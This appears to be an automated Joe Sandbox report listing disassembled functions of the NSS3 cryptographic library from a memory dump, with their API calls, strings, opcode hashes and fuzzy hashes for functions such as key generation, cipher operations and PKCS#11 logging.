API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s$oSzl"
API String ID: 2709355791-2035301586
Opcode ID: 3e12456c7b022680310cfbfba7feac16c80e87cb7158bee41f26c2f07d947085
Instruction ID: 55b9cfe48deb3c5c39554c795a23723d1f7f8e160ce63e5a5f7e689e1c6dde68
Opcode Fuzzy Hash: 3e12456c7b022680310cfbfba7feac16c80e87cb7158bee41f26c2f07d947085
Instruction Fuzzy Hash: 21513B31A091458BEF01CAE986507FF7BF99F46308F28A335E894A7A41DB3798079791

Function 6C7B29E0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 181COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,00000000,00000000,?,?,6C7B21DD,00000000), ref: 6C7B2A47
SEC_ASN1EncodeInteger_Util.NSS3(?,6C7B21DD,00000002,00000000,00000000,?,?,6C7B21DD,00000000), ref: 6C7B2A60
SECOID_FindOIDByTag_Util.NSS3(00000000,?,?,?,?,00000000,00000000,?,?,6C7B21DD,00000000), ref: 6C7B2A8E
PK11_KeyGen.NSS3(00000000,?,00000000,83F089CA,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7B2AE9
PORT_ArenaMark_Util.NSS3(00000000), ref: 6C7B2B0D
PK11_FreeSymKey.NSS3(?), ref: 6C7B2B7B
PK11_FreeSymKey.NSS3(?), ref: 6C7B2BD6

Strings

/G6/, xrefs: 6C7B29EC

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: K11_Util$Free$ArenaEncodeErrorFindInteger_Mark_Tag_
String ID: /G6/
API String ID: 1625981074-570549270
Opcode ID: 51c6b98306b9b9ca96a32b78476e0461dcad3323c54443577fdbc2f32d59ecaf
Instruction ID: 9d8d6380d0ab79764944062a35241ddf468339a65a137b0a88158a95fdf2a3d3
Opcode Fuzzy Hash: 51c6b98306b9b9ca96a32b78476e0461dcad3323c54443577fdbc2f32d59ecaf
Instruction Fuzzy Hash: EA5104B1E012059BEB108E69DE8CBAB77A4AF0432CF150138ED19BB791FB31E805C791

Function 6C7369A0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 162COMMON

Download Yara Rule

APIs

Part of subcall function 6C6CCA30: EnterCriticalSection.KERNEL32(?,?,?,6C72F9C9,?,6C72F4DA,6C72F9C9,?,?,6C6F369A), ref: 6C6CCA7A
Part of subcall function 6C6CCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C6CCB26

memset.VCRUNTIME140(00000000,00000000,?), ref: 6C736A02
EnterCriticalSection.KERNEL32(?), ref: 6C736AA6
LeaveCriticalSection.KERNEL32(?), ref: 6C736AF9
sqlite3_free.NSS3(00000000), ref: 6C736B15
sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,?,0000BCCC), ref: 6C736BA6

Strings

/G6/, xrefs: 6C7369A9
winDelete, xrefs: 6C736B71
delayed %dms for lock/sharing conflict at line %d, xrefs: 6C736B9F

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memsetsqlite3_freesqlite3_log
String ID: /G6/$delayed %dms for lock/sharing conflict at line %d$winDelete
API String ID: 1816828315-1361295040
Opcode ID: 593a011f021d2ec35172e360e7cf0fd0007fca5de54b3b5fa818c0779632e1c9
Instruction ID: 2fe5db9b68f8748f4d857d1cf28be7e8d706723936d8a99e7baef91f9ce7a819
Opcode Fuzzy Hash: 593a011f021d2ec35172e360e7cf0fd0007fca5de54b3b5fa818c0779632e1c9
Instruction Fuzzy Hash: 97510331B001159BEF249FA9EE589BE3B75FF87318B145139E51AC7681DB348A01CBD2

Function 6C7A89A0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 124COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3 ref: 6C7A89DF
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7A89EA
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C7A8A04

Part of subcall function 6C7ABC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6C7A800A,00000000,?,00000000,?), ref: 6C7ABC3F

PK11_PBEKeyGen.NSS3(00000000,?,?,00000000,?), ref: 6C7A8A47
PK11_GetInternalKeySlot.NSS3 ref: 6C7A8A7E
PK11_PBEKeyGen.NSS3(00000000,?,00000000,00000000,?), ref: 6C7A8A96

Part of subcall function 6C78F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C78F854
Part of subcall function 6C78F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C78F868
Part of subcall function 6C78F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C78F882
Part of subcall function 6C78F820: free.MOZGLUE(04C483FF,?,?), ref: 6C78F889
Part of subcall function 6C78F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C78F8A4
Part of subcall function 6C78F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C78F8AB
Part of subcall function 6C78F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C78F8C9
Part of subcall function 6C78F820: free.MOZGLUE(280F10EC,?,?), ref: 6C78F8D0

SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C7A8AD4

Strings

/G6/, xrefs: 6C7A89AF

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: free$K11_Util$CriticalDeleteItem_Section$CopyInternalSlot$AlgorithmTag_Zfree
String ID: /G6/
API String ID: 3389286309-570549270
Opcode ID: c0a3c5dbada2a81409fd2901c8c02e6677d59a0078b9f28f0c0d04fd1340a4f1
Instruction ID: edf6797d00c01f0c1d811927d669f20bca35fa6428aeef39497b3bb13f84e5ac
Opcode Fuzzy Hash: c0a3c5dbada2a81409fd2901c8c02e6677d59a0078b9f28f0c0d04fd1340a4f1
Instruction Fuzzy Hash: E441C776601304BBD7009EA5DE49B6B7768FB44718F444236FE188BB42EB32E915C7E2

Function 6C78AC10 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C78AB3E,?,?,?), ref: 6C78AC35

Part of subcall function 6C76CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C76CF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C78AB3E,?,?,?), ref: 6C78AC55

Part of subcall function 6C7A10C0: TlsGetValue.KERNEL32(?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A10F3
Part of subcall function 6C7A10C0: EnterCriticalSection.KERNEL32(?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A110C
Part of subcall function 6C7A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A1141
Part of subcall function 6C7A10C0: PR_Unlock.NSS3(?,?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A1182
Part of subcall function 6C7A10C0: TlsGetValue.KERNEL32(?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C78AB3E,?,?), ref: 6C78AC70

Part of subcall function 6C76E300: TlsGetValue.KERNEL32 ref: 6C76E33C
Part of subcall function 6C76E300: EnterCriticalSection.KERNEL32(?), ref: 6C76E350
Part of subcall function 6C76E300: PR_Unlock.NSS3(?), ref: 6C76E5BC
Part of subcall function 6C76E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C76E5CA
Part of subcall function 6C76E300: TlsGetValue.KERNEL32 ref: 6C76E5F2
Part of subcall function 6C76E300: EnterCriticalSection.KERNEL32(?), ref: 6C76E606
Part of subcall function 6C76E300: PORT_Alloc_Util.NSS3(?), ref: 6C76E613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C78AC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C78AB3E), ref: 6C78ACD7
PORT_Alloc_Util.NSS3(?), ref: 6C78AD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C78AD2B

Part of subcall function 6C76F360: TlsGetValue.KERNEL32(00000000,?,6C78A904,?), ref: 6C76F38B
Part of subcall function 6C76F360: EnterCriticalSection.KERNEL32(?,?,?,6C78A904,?), ref: 6C76F3A0
Part of subcall function 6C76F360: PR_Unlock.NSS3(?,?,?,?,6C78A904,?), ref: 6C76F3D3

Strings

/G6/, xrefs: 6C78AC1E

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID: /G6/
API String ID: 2926855110-570549270
Opcode ID: 952df3bfbaad7e19348a91e76bfe182acf91bba52fd1feb3d3731579c1fb152a
Instruction ID: cf2ab0235c4c41ed52f19bc0f2968551fc6aed9a03e069c90522e3b69c437064
Opcode Fuzzy Hash: 952df3bfbaad7e19348a91e76bfe182acf91bba52fd1feb3d3731579c1fb152a
Instruction Fuzzy Hash: D63139B1E016095FEB008F69CE499AF7776EF84338B188138E9159BB81EB31DC15C7A1

Function 6C742920 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 121timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C74294E

Part of subcall function 6C7A1820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6C741D97,?,?), ref: 6C7A1836

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C74296A
DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C742991

Part of subcall function 6C7A1820: PR_SetError.NSS3(FFFFE005,00000000,?,6C741D97,?,?), ref: 6C7A184D

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C7429AF
PR_Now.NSS3 ref: 6C742A29
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C742A50
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C742A79

Strings

/G6/, xrefs: 6C74292F

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: TimeUtil$Choice_Decode$Error$GeneralizedTime_
String ID: /G6/
API String ID: 2509447271-570549270
Opcode ID: e3c097b1ab4908d2ec595f7cf877c0840815ef3ef23877a1dcaada8d05b99440
Instruction ID: 902842883da91bbdba2c81efa5544613a1cd5c875c9542a33eaf5ef9986969ac
Opcode Fuzzy Hash: e3c097b1ab4908d2ec595f7cf877c0840815ef3ef23877a1dcaada8d05b99440
Instruction Fuzzy Hash: EC417171B093119BC714CE29CA48A5BB7E5ABD8754F168A2DEC98D3300E730E9598792

Function 6C77ACC0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C77ACE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C77AD14
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C77AD23

Part of subcall function 6C85D930: PL_strncpyz.NSS3(?,?,?), ref: 6C85D963

PR_LogPrint.NSS3(?,00000000), ref: 6C77AD39

Strings

(CK_INVALID_HANDLE), xrefs: 6C77AD1C
/G6/, xrefs: 6C77ACCC
C_MessageDecryptFinal, xrefs: 6C77ACE1
hSession = 0x%x, xrefs: 6C77ACFE, 6C77AD0E

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$/G6/$C_MessageDecryptFinal
API String ID: 332880674-711525122
Opcode ID: b642c76396217329eb4f709c007c3306cbafe1f937e606058a3a6a43ef490462
Instruction ID: 9bbed113c5c88162aecef4763ed918d95d2dc7ae91d2bd836b6507945ec2bdb8
Opcode Fuzzy Hash: b642c76396217329eb4f709c007c3306cbafe1f937e606058a3a6a43ef490462
Instruction Fuzzy Hash: E821D6717011189BEF309BA9AF8DB6E3775AB4231DF440435E80E97B12DB34E848D6E2

Function 6C772BF0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 66COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetMechanismInfo), ref: 6C772C0C
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C772C27

Part of subcall function 6C8509D0: PR_Now.NSS3 ref: 6C850A22
Part of subcall function 6C8509D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C850A35
Part of subcall function 6C8509D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C850A66
Part of subcall function 6C8509D0: PR_GetCurrentThread.NSS3 ref: 6C850A70
Part of subcall function 6C8509D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C850A9D
Part of subcall function 6C8509D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C850AC8
Part of subcall function 6C8509D0: PR_vsmprintf.NSS3(?,?), ref: 6C850AE8
Part of subcall function 6C8509D0: EnterCriticalSection.KERNEL32(?), ref: 6C850B19
Part of subcall function 6C8509D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C850B48
Part of subcall function 6C8509D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C850C76
Part of subcall function 6C8509D0: PR_LogFlush.NSS3 ref: 6C850C7E

PR_LogPrint.NSS3( type = 0x%x,?), ref: 6C772C40

Part of subcall function 6C8509D0: OutputDebugStringA.KERNEL32(?), ref: 6C850B88
Part of subcall function 6C8509D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C850C5D
Part of subcall function 6C8509D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C850C8D
Part of subcall function 6C8509D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C850C9C
Part of subcall function 6C8509D0: OutputDebugStringA.KERNEL32(?), ref: 6C850CD1
Part of subcall function 6C8509D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C850CEC
Part of subcall function 6C8509D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C850CFB
Part of subcall function 6C8509D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C850D16
Part of subcall function 6C8509D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C850D26
Part of subcall function 6C8509D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C850D35
Part of subcall function 6C8509D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C850D65
Part of subcall function 6C8509D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C850D70
Part of subcall function 6C8509D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C850D90
Part of subcall function 6C8509D0: free.MOZGLUE(00000000), ref: 6C850D99

PR_LogPrint.NSS3( pInfo = 0x%p,?), ref: 6C772C59

Part of subcall function 6C8509D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C850BAB
Part of subcall function 6C8509D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C850BBA
Part of subcall function 6C8509D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C850D7E

Strings

C_GetMechanismInfo, xrefs: 6C772C07
type = 0x%x, xrefs: 6C772C3B
pInfo = 0x%p, xrefs: 6C772C54
slotID = 0x%x, xrefs: 6C772C22

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: DebugOutputStringfflush$Printfwrite$R_snprintf$CriticalCurrentEnterExplodeFlushR_vsmprintfR_vsnprintfSectionThreadTimefputcfreememcpy
String ID: pInfo = 0x%p$ slotID = 0x%x$ type = 0x%x$C_GetMechanismInfo
API String ID: 2688868551-112346095
Opcode ID: 8fdb8644da4176ba21c7b3a8da350735a4a98432df32b25c0b0c7873b7fd6956
Instruction ID: 0c671e901297d54fefbc1b1c50abe2c36ae2da2b07f0661ccc6af7b6d8e17859
Opcode Fuzzy Hash: 8fdb8644da4176ba21c7b3a8da350735a4a98432df32b25c0b0c7873b7fd6956
Instruction Fuzzy Hash: D9219F71201158DFDF309BA5EF8CA593B75EB8221EF444435E808A7B12DB34A848DBA1

Function 6C748980 Relevance: 13.6, APIs: 9, Instructions: 150memoryCOMMON

Download Yara Rule

APIs

PORT_FreeArena_Util.NSS3(00000000,00000000,00000000,?,00000028,?,?,6C747310), ref: 6C7489B8

Part of subcall function 6C7A1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C7488A4,00000000,00000000), ref: 6C7A1228
Part of subcall function 6C7A1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C7A1238
Part of subcall function 6C7A1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C7488A4,00000000,00000000), ref: 6C7A124B
Part of subcall function 6C7A1200: PR_CallOnce.NSS3(6C8A2AA4,6C7A12D0,00000000,00000000,00000000,?,6C7488A4,00000000,00000000), ref: 6C7A125D
Part of subcall function 6C7A1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C7A126F
Part of subcall function 6C7A1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C7A1280
Part of subcall function 6C7A1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C7A128E
Part of subcall function 6C7A1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C7A129A
Part of subcall function 6C7A1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C7A12A1

PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000000,?,00000028,?,?,6C747310), ref: 6C7489E6
PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000004,?), ref: 6C748A00
CERT_CopyRDN.NSS3(00000004,00000000,6C747310,?,?,00000004,?), ref: 6C748A1B
PORT_ArenaGrow_Util.NSS3(00000004,00000000,?,?,?,?,?,?,?,00000004,?), ref: 6C748A74
PR_SetError.NSS3(FFFFE005,00000000,00000000,?,00000028,?,?,6C747310), ref: 6C748AAF
PORT_ArenaAlloc_Util.NSS3(00000004,00000008,00000000,?,00000028,?,?,6C747310), ref: 6C748AF3
PORT_ArenaGrow_Util.NSS3(00000004,?,C8850FC0,00000000,00000000,?,00000028,?,?,6C747310), ref: 6C748B1D

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Arena$Util$Alloc_$CriticalFreeGrow_PoolSectionfree$Arena_CallClearCopyDeleteEnterErrorOnceUnlockValue
String ID:
API String ID: 3791662518-0
Opcode ID: 3e718ccd6bab1a6fedfd2d9a6eb7fe1c954d190e0ed5511cbc5e350e8e81dcb0
Instruction ID: 4e5f01b7d1d7a1d326eb7485d9a07a7faeaa888d1854bf2faddad4928b55430e
Opcode Fuzzy Hash: 3e718ccd6bab1a6fedfd2d9a6eb7fe1c954d190e0ed5511cbc5e350e8e81dcb0
Instruction Fuzzy Hash: 7151E175A01218AFE7108F10CE48B6A37A8FF42718F15C16AED18DBB91E7B1E805CBD1

Function 6C75CB60 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 253COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE041,00000000,?,?,?,?,00000000,?,00000000,?,6C7657DF,00000000,?,00000002,6C765840,?), ref: 6C75CBB5
TlsGetValue.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,6C7657DF,00000000,?,00000002,6C765840,?), ref: 6C75CC4A
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,?,00000000,?,00000000,?,6C7657DF,00000000,?,00000002,6C765840), ref: 6C75CC5E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C75CC98
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C75CD50

Strings

/G6/, xrefs: 6C75CB6F
@Xvl, xrefs: 6C75CB6C, 6C75CD8D, 6C75CDA3

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterErrorSectionValue
String ID: /G6/$@Xvl
API String ID: 1974170392-645149365
Opcode ID: 01f0ba7080dd05f7cbf34eab090f3278ca59a4076121c58f4e292d885c9c1753
Instruction ID: 8c2ab09b9ba7bf2613a6d42bfcdf20ab7131e1f5f9da56e34c429e61175793b5
Opcode Fuzzy Hash: 01f0ba7080dd05f7cbf34eab090f3278ca59a4076121c58f4e292d885c9c1753
Instruction Fuzzy Hash: 4891D376E012189BDB10DFA8DE85B9EBBB4FF49319F540129E805A7711DB31E825CB90

Function 6C7E2E50 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 251COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000), ref: 6C7E3046

Part of subcall function 6C7CEE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7CEE85

PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C7B7FFB), ref: 6C7E312A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C7E3154
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C7E2E8B

Part of subcall function 6C7EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7EC2BF

Part of subcall function 6C7CF110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C7B9BFF,?,00000000,00000000), ref: 6C7CF134

memcpy.VCRUNTIME140(8B3C75C0,?,6C7B7FFA), ref: 6C7E2EA4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7E317B

Strings

/G6/, xrefs: 6C7E2E65

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
